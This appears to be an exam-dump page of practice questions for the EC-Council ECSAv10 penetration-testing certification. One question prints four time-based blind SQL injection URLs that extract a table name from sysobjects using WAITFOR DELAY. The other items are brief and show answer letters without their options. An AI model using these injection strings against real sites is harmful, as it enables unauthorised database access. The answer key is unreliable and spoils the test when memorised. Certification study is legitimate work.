ECSAv10 Dumps

ECSAv10 Free Practice Test

EC-Council ECSAv10: EC-Council Certified Security Analyst (ECSA) v10 : Penetration Testing

QUESTION 16

A pen tester has extracted a database name by using a blind SQL injection. Now he begins to test the table inside the database using the below query and finds the table:
http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=3) WAITFOR DELAY '00:00:10'-
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=101) WAITFOR DELAY '00:00:10'-
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=109) WAITFOR DELAY '00:00:10'-
http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=112) WAITFOR DELAY '00:00:10'—
What is the table name?

Correct Answer: C

QUESTION 17

How many bits is Source Port Number in TCP Header packet?

Correct Answer: D

QUESTION 18

Which of the following is not a characteristic of a firewall?

Correct Answer: D

QUESTION 19

Information gathering is performed to:
i) Collect basic information about the target company and its network
ii) Determine the operating system used, platforms running, web server versions, etc.
iii) Find vulnerabilities and exploits
ECSAv10 dumps exhibit
Which of the following pen testing tests yields information about a company’s technology infrastructure?

Correct Answer: D

QUESTION 20

Vulnerability assessment is an examination of the ability of a system or application, including current security procedures and controls, to withstand assault. It recognizes, measures, and classifies security vulnerabilities in a computer system, network, and communication channels.
A vulnerability assessment is used to identify weaknesses that could be exploited and predict the effectiveness of additional security measures in protecting information resources from attack.
ECSAv10 dumps exhibit
Which of the following vulnerability assessment technique is used to test the web server infrastructure for any misconfiguration and outdated content?

Correct Answer: D